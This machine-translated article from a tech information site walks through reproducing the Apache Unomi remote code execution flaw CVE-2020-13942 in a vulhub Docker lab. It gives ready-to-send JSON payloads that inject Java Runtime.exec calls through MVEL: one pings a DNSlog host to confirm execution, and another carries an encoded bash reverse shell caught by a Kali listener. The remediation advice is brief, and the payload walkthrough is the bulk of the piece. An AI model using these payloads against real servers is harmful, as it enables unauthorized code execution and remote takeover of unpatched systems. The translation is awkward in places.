Shulou(Shulou.com)05/31 Report--

How to achieve Apache Unomi remote code execution vulnerability CVE-2020-13942 recurrence, I believe that many inexperienced people do not know what to do, so this paper summarizes the causes of the problem and solutions, through this article I hope you can solve this problem.

Introduction to 0x00

Apache Unomi is a standards-based customer / data platform (CDP,Customer Data Platform) for managing information such as online customers and visitors to provide personalized experiences that comply with guest privacy rules, such as GDPR and "do not track" preferences. It was originally developed by Jahia and submitted to the Apache Incubator in October 2015.

Apache Unomi has functions such as privacy management, user / event / target tracking, reporting, guest profile management, segmentation, roles, Ahand B testing, etc., which can be used as:

0.Web CMS Personalized Service

Analysis services for native mobile applications

A centralized profile management system with segmented function

Authorization Management Center

Overview of 0x01 vulnerabilities

Prior to Apache Unomi 1.5.1, attackers could send malicious requests through specially crafted MVEL or ONGl expressions, causing the Unomi server to execute arbitrary code corresponding to the vulnerability number CVE-2020-11975, while the CVE-2020-13942 vulnerability was a patch bypass for the CVE-2020-11975 vulnerability, where the attacker bypassed the patch-detected blacklist, sent malicious requests, and executed arbitrary code on the server.

0x02 affects version

Apache Unomi < 1.5.2

0x03 environment building

1. This environment is built using the docker environment in vulhub, and the download address

Https://github.com/vulhub/vulhub

2. Then use the CVE-2020-13942 vulnerability under the unomi directory in vulhub to reproduce the environment for this vulnerability

Cd vulhub/unomi/CVE-2020-13942 /

3. Use the following command to start the vulnerability environment

Docker-compose up-d

4. The green font done below indicates that the startup is successful. When the browser accesses the http://your-ip:8181, the following interface indicates success.

Recurrence of 0x04 vulnerabilities

1. Open the home page of the shooting range, grab the packet using burp, and send it to the Repeater module to construct the packet.

2. Change the GET package to POST, delete the redundant fields, keep the Host, User-Agent and Content-Length fields, then add the following data, add it to your own address in dnslog, and then send it

{"filters": [{"id": "boom", "filters": [{"condition": {"parameterValues": {"": "script::Runtime r = Runtime.getRuntime (); r.exec ('ping DNSlog');"}, "type": "profilePropertyCondition"}]}, "sessionId": "boom"}

3. Refresh the dnslog website to see if there is any data. You can see if there is any data.

4. Take advantage of this vulnerability to bounce shell, and encode the command of bash bounce shell. The coding URL is http://www.jackson-t.ca/runtime-exec-payloads.html.

5. Add the encoded shell to the shell code in the following code, set kali to listen, and then send it.

{"filters": [{"id": "boom", "filters": [{"condition": {"parameterValues": {"script::Runtime r = Runtime.getRuntime (); r.exec (\" shell code\ ");"}, "type": "profilePropertyCondition"}]}, "sessionId": "boom"}

6. Check the shell returned successfully on kali.

0x05 repair recommendation

1. Avoid putting user data into the expression interpreter whenever possible.

2. At present, the manufacturer has released the latest version, please download and update it to the latest version in time.

After reading the above, have you mastered how to reproduce the Apache Unomi remote code execution vulnerability CVE-2020-13942? If you want to learn more skills or want to know more about it, you are welcome to follow the industry information channel, thank you for reading!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.